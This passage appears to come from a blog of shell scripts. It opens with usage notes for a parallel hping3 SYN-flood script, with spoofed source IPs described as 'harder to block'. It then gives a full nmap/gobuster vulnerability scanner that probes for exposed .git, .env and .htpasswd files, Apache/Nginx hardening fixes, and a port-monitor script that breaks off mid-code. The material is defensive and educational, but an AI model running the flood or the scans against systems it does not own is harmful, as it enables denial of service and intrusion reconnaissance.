# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (–rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

Macbook: Useful/Basic NMAP script to check for vulnerabilities and create a formatted report

If you want to quickly health check your website, then the following script is a simple NMAP script that scans your site for common issues and formats the results in a nice report style.

#!/bin/bash
# Nmap Vulnerability Scanner with Severity Grouping, TLS checks, and Directory Discovery
# Usage: ./vunscan.sh <target_domain>
# Colors for output
RED='\033[0;31m'
ORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
# Check if target is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <target_domain>"
echo "Example: $0 example.com"
exit 1
fi
TARGET=$1
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="vuln_scan_${TARGET}_${TIMESTAMP}"
RAW_OUTPUT="${OUTPUT_DIR}/raw_scan.xml"
OPEN_PORTS=""
# Debug output
echo "DEBUG: TARGET=$TARGET"
echo "DEBUG: TIMESTAMP=$TIMESTAMP"
echo "DEBUG: OUTPUT_DIR=$OUTPUT_DIR"
echo "DEBUG: RAW_OUTPUT=$RAW_OUTPUT"
# Create output directory
mkdir -p "$OUTPUT_DIR"
if [ ! -d "$OUTPUT_DIR" ]; then
echo -e "${RED}Error: Failed to create output directory $OUTPUT_DIR${NC}"
exit 1
fi
echo "================================================================"
echo "         Vulnerability Scanner for $TARGET"
echo "================================================================"
echo "Scan started at: $(date)"
echo "Results will be saved in: $OUTPUT_DIR"
echo ""
# Function to print section headers
print_header() {
echo -e "\n${BLUE}================================================================${NC}"
echo -e "${BLUE}$1${NC}"
echo -e "${BLUE}================================================================${NC}"
}
# Function to run nmap scan
run_scan() {
print_header "Running Comprehensive Vulnerability Scan"
echo "This may take several minutes…"
# First, determine which ports are open
echo "Phase 1: Port discovery..."
echo "Scanning for open ports (this may take a while)..."
# Try a faster scan first on common ports
nmap -p 1-1000,8080,8443,3306,5432,27017 --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null
# If user wants full scan, uncomment the next line and comment the previous one
# nmap -p- --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports.txt" 2>/dev/null
# Extract open ports
if [ -f "${OUTPUT_DIR}/open_ports_quick.txt" ]; then
OPEN_PORTS=$(grep -oE '[0-9]+/open' "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
fi
# If no ports found, try common web ports
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports found in quick scan. Checking common web ports...${NC}"
# Test common ports individually
COMMON_PORTS="80,443,8080,8443,22,21,25,3306,5432"
OPEN_PORTS=""
for port in $(echo $COMMON_PORTS | tr ',' ' '); do
echo -n "Testing port $port... "
if nmap -p $port --open "$TARGET" 2>/dev/null | grep -q "open"; then
echo "open"
if [ -z "$OPEN_PORTS" ]; then
OPEN_PORTS="$port"
else
OPEN_PORTS="$OPEN_PORTS,$port"
fi
else
echo "closed/filtered"
fi
done
fi
# Final fallback
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports detected. Using default web ports for scanning.${NC}"
OPEN_PORTS="80,443"
fi
echo ""
echo "Ports to scan: $OPEN_PORTS"
echo ""
# Main vulnerability scan with http-vulners-regex
echo "Phase 2: Vulnerability scanning..."
nmap -sV -sC --script vuln,http-vulners-regex \
--script-args vulns.showall,http-vulners-regex.paths={/} \
-p "$OPEN_PORTS" \
-oX "$RAW_OUTPUT" \
-oN "${OUTPUT_DIR}/scan_normal.txt" \
"$TARGET"
if [ $? -ne 0 ]; then
echo -e "${RED}Error: Nmap scan failed${NC}"
# Don't exit, continue with other scans
fi
}
# Function to parse and categorize vulnerabilities
parse_vulnerabilities() {
print_header "Parsing and Categorizing Vulnerabilities"
# Initialize arrays
declare -a critical_vulns=()
declare -a high_vulns=()
declare -a medium_vulns=()
declare -a low_vulns=()
declare -a info_vulns=()
# Create temporary files for each severity
CRITICAL_FILE="${OUTPUT_DIR}/critical.tmp"
HIGH_FILE="${OUTPUT_DIR}/high.tmp"
MEDIUM_FILE="${OUTPUT_DIR}/medium.tmp"
LOW_FILE="${OUTPUT_DIR}/low.tmp"
INFO_FILE="${OUTPUT_DIR}/info.tmp"
# Clear temp files
> "$CRITICAL_FILE"
> "$HIGH_FILE"
> "$MEDIUM_FILE"
> "$LOW_FILE"
> "$INFO_FILE"
# Parse XML output for vulnerabilities
if [ -f "$RAW_OUTPUT" ]; then
# Extract script output and categorize by common vulnerability indicators
grep -A 20 '<script id=".*vuln.*"' "$RAW_OUTPUT" | while read line; do
if echo "$line" | grep -qi "CRITICAL\|CVE.*CRITICAL\|score.*9\|score.*10"; then
echo "$line" >> "$CRITICAL_FILE"
elif echo "$line" | grep -qi "HIGH\|CVE.*HIGH\|score.*[7-8]"; then
echo "$line" >> "$HIGH_FILE"
elif echo "$line" | grep -qi "MEDIUM\|CVE.*MEDIUM\|score.*[4-6]"; then
echo "$line" >> "$MEDIUM_FILE"
elif echo "$line" | grep -qi "LOW\|CVE.*LOW\|score.*[1-3]"; then
echo "$line" >> "$LOW_FILE"
elif echo "$line" | grep -qi "INFO\|INFORMATION"; then
echo "$line" >> "$INFO_FILE"
fi
done
# Also parse normal output for vulnerability information
if [ -f "${OUTPUT_DIR}/scan_normal.txt" ]; then
# Look for common vulnerability patterns in normal output
grep -E "(CVE-|VULNERABLE|State: VULNERABLE)" "${OUTPUT_DIR}/scan_normal.txt" | while read vuln_line; do
if echo "$vuln_line" | grep -qi "critical\|9\.[0-9]\|10\.0"; then
echo "$vuln_line" >> "$CRITICAL_FILE"
elif echo "$vuln_line" | grep -qi "high\|[7-8]\.[0-9]"; then
echo "$vuln_line" >> "$HIGH_FILE"
elif echo "$vuln_line" | grep -qi "medium\|[4-6]\.[0-9]"; then
echo "$vuln_line" >> "$MEDIUM_FILE"
elif echo "$vuln_line" | grep -qi "low\|[1-3]\.[0-9]"; then
echo "$vuln_line" >> "$LOW_FILE"
else
echo "$vuln_line" >> "$INFO_FILE"
fi
done
fi
fi
}
# Function to display vulnerabilities by severity
display_results() {
print_header "VULNERABILITY SCAN RESULTS"
# Critical Vulnerabilities
echo -e "\n${RED}🔴 CRITICAL SEVERITY VULNERABILITIES${NC}"
echo "=================================================="
if [ -s "${OUTPUT_DIR}/critical.tmp" ]; then
cat "${OUTPUT_DIR}/critical.tmp" | head -20
CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
echo -e "${RED}Total Critical: $CRITICAL_COUNT${NC}"
else
echo -e "${GREEN}✓ No critical vulnerabilities found${NC}"
fi
# High Vulnerabilities
echo -e "\n${ORANGE}🟠 HIGH SEVERITY VULNERABILITIES${NC}"
echo "============================================="
if [ -s "${OUTPUT_DIR}/high.tmp" ]; then
cat "${OUTPUT_DIR}/high.tmp" | head -15
HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
echo -e "${ORANGE}Total High: $HIGH_COUNT${NC}"
else
echo -e "${GREEN}✓ No high severity vulnerabilities found${NC}"
fi
# Medium Vulnerabilities
echo -e "\n${YELLOW}🟡 MEDIUM SEVERITY VULNERABILITIES${NC}"
echo "==============================================="
if [ -s "${OUTPUT_DIR}/medium.tmp" ]; then
cat "${OUTPUT_DIR}/medium.tmp" | head -10
MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
echo -e "${YELLOW}Total Medium: $MEDIUM_COUNT${NC}"
else
echo -e "${GREEN}✓ No medium severity vulnerabilities found${NC}"
fi
# Low Vulnerabilities
echo -e "\n${BLUE}🔵 LOW SEVERITY VULNERABILITIES${NC}"
echo "=========================================="
if [ -s "${OUTPUT_DIR}/low.tmp" ]; then
cat "${OUTPUT_DIR}/low.tmp" | head -8
LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
echo -e "${BLUE}Total Low: $LOW_COUNT${NC}"
else
echo -e "${GREEN}✓ No low severity vulnerabilities found${NC}"
fi
# Information/Other
echo -e "\n${GREEN}ℹ️  INFORMATIONAL${NC}"
echo "========================="
if [ -s "${OUTPUT_DIR}/info.tmp" ]; then
cat "${OUTPUT_DIR}/info.tmp" | head -5
INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo -e "${GREEN}Total Info: $INFO_COUNT${NC}"
else
echo "No informational items found"
fi
}
# Function to run gobuster scan for enhanced directory discovery
run_gobuster_scan() {
echo "Running gobuster directory scan..."
GOBUSTER_RESULTS="${OUTPUT_DIR}/gobuster_results.txt"
PERMISSION_ANALYSIS="${OUTPUT_DIR}/gobuster_permissions.txt"
> "$PERMISSION_ANALYSIS"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Scanning $PROTOCOL://$TARGET:$port with gobuster..."
# Run gobuster with common wordlist
if [ -f "/usr/share/wordlists/dirb/common.txt" ]; then
WORDLIST="/usr/share/wordlists/dirb/common.txt"
elif [ -f "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ]; then
WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
else
# Create a small built-in wordlist
WORDLIST="${OUTPUT_DIR}/temp_wordlist.txt"
cat > "$WORDLIST" <<EOF
admin
administrator
api
backup
bin
cgi-bin
config
data
database
db
debug
dev
development
doc
docs
documentation
download
downloads
error
errors
export
files
hidden
images
img
include
includes
js
library
log
logs
manage
management
manager
media
old
private
proc
public
resources
scripts
secret
secure
server-status
staging
static
storage
system
temp
templates
test
testing
tmp
upload
uploads
users
var
vendor
web
webapp
wp-admin
wp-content
.git
.svn
.env
.htaccess
.htpasswd
robots.txt
sitemap.xml
web.config
phpinfo.php
info.php
test.php
EOF
fi
# Run gobuster with status code analysis
gobuster dir -u "$PROTOCOL://$TARGET:$port" \
-w "$WORDLIST" \
-k \
-t 10 \
--no-error \
-o "${GOBUSTER_RESULTS}_${port}.txt" \
-s "200,204,301,302,307,401,403,405" 2>/dev/null
# Analyze results for permission issues
if [ -f "${GOBUSTER_RESULTS}_${port}.txt" ]; then
echo "Analyzing gobuster results for permission issues..."
# Check for 403 Forbidden directories
grep "Status: 403" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${ORANGE}[403 Forbidden]${NC} $PROTOCOL://$TARGET:$port$dir - Directory exists but access denied" >> "$PERMISSION_ANALYSIS"
echo -e "${ORANGE}  Permission Issue:${NC} $PROTOCOL://$TARGET:$port$dir (403 Forbidden)"
done
# Check for 401 Unauthorized directories
grep "Status: 401" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${YELLOW}[401 Unauthorized]${NC} $PROTOCOL://$TARGET:$port$dir - Authentication required" >> "$PERMISSION_ANALYSIS"
echo -e "${YELLOW}  Auth Required:${NC} $PROTOCOL://$TARGET:$port$dir (401 Unauthorized)"
done
# Check for directory listing enabled (potentially dangerous)
grep "Status: 200" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
# Check if it's a directory by looking for trailing slash or common directory patterns
if [[ "$dir" =~ /$ ]] || [[ ! "$dir" =~ \. ]]; then
# Test if directory listing is enabled
RESPONSE=$(curl -k -s --max-time 5 "$PROTOCOL://$TARGET:$port$dir" 2>/dev/null)
if echo "$RESPONSE" | grep -qi "index of\|directory listing\|parent directory\|<pre>\|<dir>"; then
echo -e "${RED}[Directory Listing Enabled]${NC} $PROTOCOL://$TARGET:$port$dir - SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Directory Listing:${NC} $PROTOCOL://$TARGET:$port$dir"
fi
fi
done
# Check for sensitive files with incorrect permissions
for sensitive_file in ".git/config" ".env" ".htpasswd" "web.config" "phpinfo.php" "info.php" ".DS_Store" "Thumbs.db"; do
if grep -q "/$sensitive_file.*Status: 200" "${GOBUSTER_RESULTS}_${port}.txt"; then
echo -e "${RED}[Sensitive File Exposed]${NC} $PROTOCOL://$TARGET:$port/$sensitive_file - CRITICAL SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Sensitive File:${NC} $PROTOCOL://$TARGET:$port/$sensitive_file"
fi
done
fi
done
# Clean up temporary wordlist if created
[ -f "${OUTPUT_DIR}/temp_wordlist.txt" ] && rm -f "${OUTPUT_DIR}/temp_wordlist.txt"
# Display permission analysis summary
if [ -s "$PERMISSION_ANALYSIS" ]; then
echo ""
echo -e "${ORANGE}=== Directory Permission Issues Summary ===${NC}"
cat "$PERMISSION_ANALYSIS"
# Count different types of issues
FORBIDDEN_COUNT=$(grep -c "403 Forbidden" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
UNAUTH_COUNT=$(grep -c "401 Unauthorized" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
LISTING_COUNT=$(grep -c "Directory Listing Enabled" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
SENSITIVE_COUNT=$(grep -c "Sensitive File Exposed" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
echo ""
echo "Permission Issue Statistics:"
echo "  - 403 Forbidden directories: $FORBIDDEN_COUNT"
echo "  - 401 Unauthorized directories: $UNAUTH_COUNT"
echo "  - Directory listings enabled: $LISTING_COUNT"
echo "  - Sensitive files exposed: $SENSITIVE_COUNT"
fi
}
# Function to run TLS/SSL checks
run_tls_checks() {
print_header "Running TLS/SSL Security Checks"
# Check for HTTPS ports
HTTPS_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '443|8443' | tr '\n' ',' | sed 's/,$//')
if [ -z "$HTTPS_PORTS" ]; then
HTTPS_PORTS="443"
echo "No HTTPS ports found in scan, checking default port 443..."
fi
echo "Checking TLS/SSL on ports: $HTTPS_PORTS"
# Run SSL scan using nmap ssl scripts
nmap -sV --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-ccs-injection,ssl-heartbleed,ssl-poodle,sslv2,tls-alpn,tls-nextprotoneg \
-p "$HTTPS_PORTS" \
-oN "${OUTPUT_DIR}/tls_scan.txt" \
"$TARGET" 2>/dev/null
# Parse TLS results
TLS_ISSUES_FILE="${OUTPUT_DIR}/tls_issues.txt"
> "$TLS_ISSUES_FILE"
# Check for weak ciphers
if grep -q "TLSv1.0\|SSLv2\|SSLv3" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "CRITICAL: Outdated SSL/TLS protocols detected" >> "$TLS_ISSUES_FILE"
fi
# Check for weak cipher suites
if grep -q "DES\|RC4\|MD5" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "HIGH: Weak cipher suites detected" >> "$TLS_ISSUES_FILE"
fi
# Check for certificate issues
if grep -q "expired\|self-signed" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "MEDIUM: Certificate issues detected" >> "$TLS_ISSUES_FILE"
fi
# Display TLS results
echo ""
if [ -s "$TLS_ISSUES_FILE" ]; then
echo -e "${RED}TLS/SSL Issues Found:${NC}"
cat "$TLS_ISSUES_FILE"
else
echo -e "${GREEN}✓ No major TLS/SSL issues detected${NC}"
fi
echo ""
}
# Function to run directory busting and permission checks
run_dirbuster() {
print_header "Running Directory Discovery and Permission Checks"
# Check for web ports
WEB_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '^(80|443|8080|8443)$' | tr '\n' ',' | sed 's/,$//')
if [ -z "$WEB_PORTS" ]; then
echo "No standard web ports found in open ports, checking defaults..."
WEB_PORTS="80,443"
fi
echo "Running directory discovery on web ports: $WEB_PORTS"
# Check if gobuster is available
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}Using gobuster for enhanced directory discovery and permission checks${NC}"
run_gobuster_scan
else
echo -e "${YELLOW}Gobuster not found. Using fallback method.${NC}"
echo -e "${YELLOW}Install gobuster for enhanced directory permission checks: brew install gobuster${NC}"
fi
# Use nmap's http-enum script for directory discovery
nmap -sV --script http-enum \
--script-args http-enum.basepath='/' \
-p "$WEB_PORTS" \
-oN "${OUTPUT_DIR}/dirbuster.txt" \
"$TARGET" 2>/dev/null
# Common directory wordlist (built-in small list)
COMMON_DIRS="admin administrator backup api config test dev staging uploads download downloads files documents images img css js scripts cgi-bin wp-admin phpmyadmin .git .svn .env .htaccess robots.txt sitemap.xml"
# Quick check for common directories using curl
DIRS_FOUND_FILE="${OUTPUT_DIR}/directories_found.txt"
> "$DIRS_FOUND_FILE"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Checking common directories on $PROTOCOL://$TARGET:$port"
for dir in $COMMON_DIRS; do
URL="$PROTOCOL://$TARGET:$port/$dir"
STATUS=$(curl -k -s -o /dev/null -w "%{http_code}" --max-time 3 "$URL" 2>/dev/null)
if [[ "$STATUS" == "200" || "$STATUS" == "301" || "$STATUS" == "302" || "$STATUS" == "401" || "$STATUS" == "403" ]]; then
echo "[$STATUS] $URL" >> "$DIRS_FOUND_FILE"
echo -e "${GREEN}Found:${NC} [$STATUS] $URL"
# Check for permission issues
if [[ "$STATUS" == "403" ]]; then
echo -e "${ORANGE}  ⚠️  Permission denied (403) - Possible misconfiguration${NC}"
echo "[PERMISSION ISSUE] 403 Forbidden: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
elif [[ "$STATUS" == "401" ]]; then
echo -e "${YELLOW}  🔒 Authentication required (401)${NC}"
echo "[AUTH REQUIRED] 401 Unauthorized: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
fi
fi
done
done
# Display results
echo ""
if [ -s "$DIRS_FOUND_FILE" ]; then
echo -e "${YELLOW}Directories/Files discovered:${NC}"
cat "$DIRS_FOUND_FILE"
else
echo "No additional directories found"
fi
# Display permission issues if found
if [ -s "${OUTPUT_DIR}/permission_issues.txt" ]; then
echo ""
echo -e "${ORANGE}Directory Permission Issues Found:${NC}"
cat "${OUTPUT_DIR}/permission_issues.txt"
fi
echo ""
}
# Function to generate summary report
generate_summary() {
print_header "SCAN SUMMARY"
CRITICAL_COUNT=0
HIGH_COUNT=0
MEDIUM_COUNT=0
LOW_COUNT=0
INFO_COUNT=0
[ -f "${OUTPUT_DIR}/critical.tmp" ] && CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
[ -f "${OUTPUT_DIR}/high.tmp" ] && HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
[ -f "${OUTPUT_DIR}/medium.tmp" ] && MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
[ -f "${OUTPUT_DIR}/low.tmp" ] && LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
[ -f "${OUTPUT_DIR}/info.tmp" ] && INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo "Target: $TARGET"
echo "Scan Date: $(date)"
echo ""
echo -e "${RED}Critical:       $CRITICAL_COUNT${NC}"
echo -e "${ORANGE}High:           $HIGH_COUNT${NC}"
echo -e "${YELLOW}Medium:         $MEDIUM_COUNT${NC}"
echo -e "${BLUE}Low:            $LOW_COUNT${NC}"
echo -e "${GREEN}Informational:  $INFO_COUNT${NC}"
echo ""
TOTAL=$((CRITICAL_COUNT + HIGH_COUNT + MEDIUM_COUNT + LOW_COUNT))
echo "Total Vulnerabilities: $TOTAL"
# Risk assessment
if [ $CRITICAL_COUNT -gt 0 ]; then
echo -e "${RED}🚨 RISK LEVEL: CRITICAL - Immediate action required!${NC}"
elif [ $HIGH_COUNT -gt 0 ]; then
echo -e "${ORANGE}⚠️  RISK LEVEL: HIGH - Action required soon${NC}"
elif [ $MEDIUM_COUNT -gt 0 ]; then
echo -e "${YELLOW}⚡ RISK LEVEL: MEDIUM - Should be addressed${NC}"
elif [ $LOW_COUNT -gt 0 ]; then
echo -e "${BLUE}📋 RISK LEVEL: LOW - Monitor and plan fixes${NC}"
else
echo -e "${GREEN}✅ RISK LEVEL: MINIMAL - Good security posture${NC}"
fi
# Save summary to file
{
echo "Vulnerability Scan Summary for $TARGET"
echo "======================================"
echo "Scan Date: $(date)"
echo ""
echo "Critical: $CRITICAL_COUNT"
echo "High: $HIGH_COUNT"
echo "Medium: $MEDIUM_COUNT"
echo "Low: $LOW_COUNT"
echo "Informational: $INFO_COUNT"
echo "Total: $TOTAL"
echo ""
echo "Additional Checks:"
[ -f "${OUTPUT_DIR}/tls_issues.txt" ] && [ -s "${OUTPUT_DIR}/tls_issues.txt" ] && echo "TLS/SSL Issues: $(wc -l < "${OUTPUT_DIR}/tls_issues.txt")"
[ -f "${OUTPUT_DIR}/directories_found.txt" ] && [ -s "${OUTPUT_DIR}/directories_found.txt" ] && echo "Directories Found: $(wc -l < "${OUTPUT_DIR}/directories_found.txt")"
[ -f "${OUTPUT_DIR}/gobuster_permissions.txt" ] && [ -s "${OUTPUT_DIR}/gobuster_permissions.txt" ] && echo "Directory Permission Issues: $(wc -l < "${OUTPUT_DIR}/gobuster_permissions.txt")"
} > "${OUTPUT_DIR}/summary.txt"
}
# Main execution
main() {
echo "Starting vulnerability scan for $TARGET…"
# Check if required tools are installed
if ! command -v nmap &> /dev/null; then
echo -e "${RED}Error: nmap is not installed. Please install nmap first.${NC}"
exit 1
fi
if ! command -v curl &> /dev/null; then
echo -e "${RED}Error: curl is not installed. Please install curl first.${NC}"
exit 1
fi
# Check for optional tools
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}✓ Gobuster found - Enhanced directory scanning enabled${NC}"
else
echo -e "${YELLOW}ℹ️  Gobuster not found - Basic directory scanning will be used${NC}"
echo -e "${YELLOW}   Install with: brew install gobuster (macOS) or apt install gobuster (Linux)${NC}"
fi
# Run the main vulnerability scan
run_scan
# Run TLS/SSL checks
run_tls_checks
# Run directory discovery
run_dirbuster
# Parse results
parse_vulnerabilities
# Display formatted results
display_results
# Generate summary
generate_summary
# Cleanup temporary files
rm -f "${OUTPUT_DIR}"/*.tmp
print_header "SCAN COMPLETE"
echo "All results saved in: $OUTPUT_DIR"
echo "Summary saved in: ${OUTPUT_DIR}/summary.txt"
echo -e "${GREEN}Scan completed at: $(date)${NC}"
}
# Run main function
main

Here’s a comprehensive guide on how to fix each type of directory permission issue that the above script might find (for apache):

## 1. **403 Forbidden Errors**
### What it means:
The directory/file exists but the server is denying access to it.
### How to fix:
# For Apache (.htaccess)
# Add to .htaccess in the directory:
Order deny,allow
Deny from all
# Or remove the directory from web access entirely
# Move sensitive directories outside the web root
mv /var/www/html/backup /var/backups/
# For Nginx
# Add to nginx.conf:
location /admin {
deny all;
return 404;  # Return 404 instead of 403 to hide existence
}
## 2. **401 Unauthorized Errors**
### What it means:
Authentication is required but may not be properly configured.
### How to fix:
# For Apache - create .htpasswd file
htpasswd -c /etc/apache2/.htpasswd username
# Add to .htaccess:
AuthType Basic
AuthName "Restricted Access"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
# For Nginx:
# Install apache2-utils for htpasswd
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd username
# Add to nginx.conf:
location /admin {
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.htpasswd;
}
## 3. **Directory Listing Enabled (CRITICAL)**
### What it means:
Anyone can see all files in the directory - major security risk!
### How to fix:
# For Apache
# Method 1: Add to .htaccess in the directory
Options -Indexes
# Method 2: Add to Apache config (httpd.conf or apache2.conf)
<Directory /var/www/html>
Options -Indexes
</Directory>
# For Nginx
# Add to nginx.conf (Nginx doesn't have directory listing by default)
# If you see it enabled, remove:
autoindex off;  # This should be the default
# Create index files in empty directories
echo "<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1></body></html>" > index.html
## 4. **Sensitive Files Exposed (CRITICAL)**
### Common exposed files and fixes:
#### **.git directory**
# Remove .git from production
rm -rf /var/www/html/.git
# Or block access via .htaccess
<Files ~ "^\.git">
Order allow,deny
Deny from all
</Files>
# For Nginx:
location ~ /\.git {
deny all;
return 404;
}
#### **.env file**
# Move outside web root
mv /var/www/html/.env /var/www/
# Update your application to read from new location
# In PHP: require_once __DIR__ . '/../.env';
# Block via .htaccess
<Files .env>
Order allow,deny
Deny from all
</Files>
#### **Configuration files (config.php, settings.php)**
# Move sensitive configs outside web root
mv /var/www/html/config.php /var/www/config/
# Or restrict access via .htaccess
<Files "config.php">
Order allow,deny
Deny from all
</Files>
#### **Backup files**
# Remove backup files from web directory
find /var/www/html -name "*.bak" -o -name "*.backup" -o -name "*.old" | xargs rm -f
# Create a cron job to clean regularly
echo "0 2 * * * find /var/www/html -name '*.bak' -o -name '*.backup' -delete" | crontab -
## 5. **General Security Best Practices**
### Create a comprehensive .htaccess file:
# Disable directory browsing
Options -Indexes
# Deny access to hidden files and directories
<Files .*>
Order allow,deny
Deny from all
</Files>
# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
Order allow,deny
Deny from all
</FilesMatch>
# Protect sensitive files
location ~ /(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$ {
deny all;
return 404;
}
## 6. Quick Security Audit Commands
## Run these commands to find and fix common issues:
# Find all .git directories in web root
find /var/www/html -type d -name .git
# Find all .env files
find /var/www/html -name .env
# Find all backup files
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)
# Find directories without index files (potential listing)
find /var/www/html -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;
# Set proper permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
## 7. Testing Your Fixes
## After implementing fixes, test them:
# Test that sensitive files are blocked
curl -I https://yoursite.com/.git/config
# Should return 403 or 404
# Test that directory listing is disabled
curl https://yoursite.com/images/
# Should not show a file list
# Run the vunscan.sh script again
./vunscan.sh yoursite.com
# Verify issues are resolved
## 8. Preventive Measures
## 1. Use a deployment script that excludes sensitive files:
bash
## 2. Regular security scans:
bash
## 3. Use a Web Application Firewall (WAF) like ModSecurity or Cloudflare
# Remember: The goal is not just to hide these files (security through obscurity) but to properly secure them or remove them from the web-accessible directory entirely.

MacOs: How to see which processes are using a specific port (eg 443)

Below is a useful script when you want to see which processes are using a specific port.

#!/bin/bash
# Port Monitor Script for macOS
# Usage: ./port_monitor.sh <port_number>
# Check if port number is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <port_number>"
echo "Example: $0 8080"
exit 1
fi
PORT=$1
# Validate port number
if ! [[ $PORT =~ ^[0-9]+$ ]] || [ $PORT -lt 1 ] || [ $PORT -gt 65535 ]; then
echo "Error: Please provide a valid port number (1-65535)"
exit 1
fi
# Function to display processes using the port
show_port_usage() {
local timestamp=$(date "+%Y-%m-%d %H:%M:%S")
# Clear screen for better readability
clear
echo "=================================="
echo "Port Monitor - Port $PORT"
echo "Last updated: $timestamp"
echo "Press Ctrl+C to exit"
echo "=================================="
echo
# Check for processes using the port with lsof - both TCP and UDP
if lsof -i :$PORT &>/dev/null || netstat -an | grep -E "[:.]$PORT[[:space:]]" &>/dev/null; then
echo "Processes using port $PORT:"
echo
lsof -i :$PORT -P -n | head -1
echo "--------------------------------------------------------------------------------"
lsof -i :$PORT -P -n | tail -n +2
echo
# Also show netstat information for additional context
echo "Network connections on port $PORT:"
echo
printf "%-6s %-30s %-30s %-12s\n" "PROTO" "LOCAL ADDRESS" "FOREIGN ADDRESS" "STATE"
echo "--------------------------------------------------------------------------------------------"
# Show all connections (LISTEN, ESTABLISHED, etc.)
# Use netstat -n to show numeric addresses
netstat -anp tcp | grep -E "\.$PORT[[:space:]]" | while read line; do
# Extract the relevant fields from netstat output
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
foreign_addr=$(echo "$line" | awk '{print $5}')
state=$(echo "$line" | awk '{print $6}')
# Only print if we have valid data
if [ -n "$proto" ] && [ -n "$local_addr" ]; then
printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "$state"
fi
done
# Also check UDP connections
netstat -anp udp | grep -E "\.$PORT[[:space:]]" | while read line; do
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
